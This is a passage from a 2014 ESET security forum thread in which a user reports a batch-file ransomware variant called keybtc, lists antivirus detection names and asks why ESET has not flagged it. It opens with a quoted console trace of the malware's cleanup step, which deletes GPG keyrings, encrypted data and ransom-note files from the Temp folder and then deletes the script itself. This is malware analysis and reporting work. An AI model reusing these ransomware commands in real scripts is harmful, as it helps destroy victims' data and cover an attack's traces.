"C:\Users\%UserName%\AppData\Local\Temp\ltr*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\trustdb.gpg"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\random_seed"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\crypta.bin"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.lock"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.btc"C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.html"C:\Users\%UserName%\AppData\Local\Temp>del /f /q keybtc.cmd Remark: start hxxp://bit.ly/keybtc - hxxp://en.wikipedia.org/wiki/RSA_(cryptosystem)#Key_generation Why it opens this Wikipedia page? information above @Malwarehunter (malwaretips.com) Can you explain why after 3 days i sent file keybtc.btc are still undetected? https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/ AVG Generic11_c.QPE 20140808 Avast Other:Malware-gen [Trj] 20140807 DrWeb BAT.Encoder.23 20140808 Emsisoft Trojan-Ransom.BAT.Agent (A) 20140808 GData Script.Trojan-Ransom.Scatter.A 20140808 Kaspersky Trojan-Ransom.BAT.Scatter.s 20140808 Microsoft Ransom:BAT/Xibow.A 20140808 Symantec Trojan Horse 20140808 Tencent Bat.Trojan.Scatter.Lnes 20140808 ESET=?????? All file sent to you i give you source link to download When ESET Malware Response Team add detection? Why ESET Malware Response Team don't block dowload of *.btc files and only block *.zip file from collapseit.com? Why from 3 days ESET Malware Response Team haven't answer to my mail? Thanks Edited August 8, 2014 by JAMEWT Link to comment Share on other sites More sharing options...
JAMEWT 4 Posted August 8, 2014 Author Share Posted August 8, 2014 update now Eset block all download files from collapseit.com (GOOD WORK ESET) keybtc.btc are still undetected Link to comment Share on other sites More sharing options...
Administrators Marcos 5,277 Posted August 8, 2014 Administrators Share Posted August 8, 2014 To keep the discussion at one place, we'll draw this topic to a close. Please continue here: https://forum.eset.com/topic/3001-new-cryptolocker-variant/ Link to comment Share on other sites More sharing options...
Recommended Posts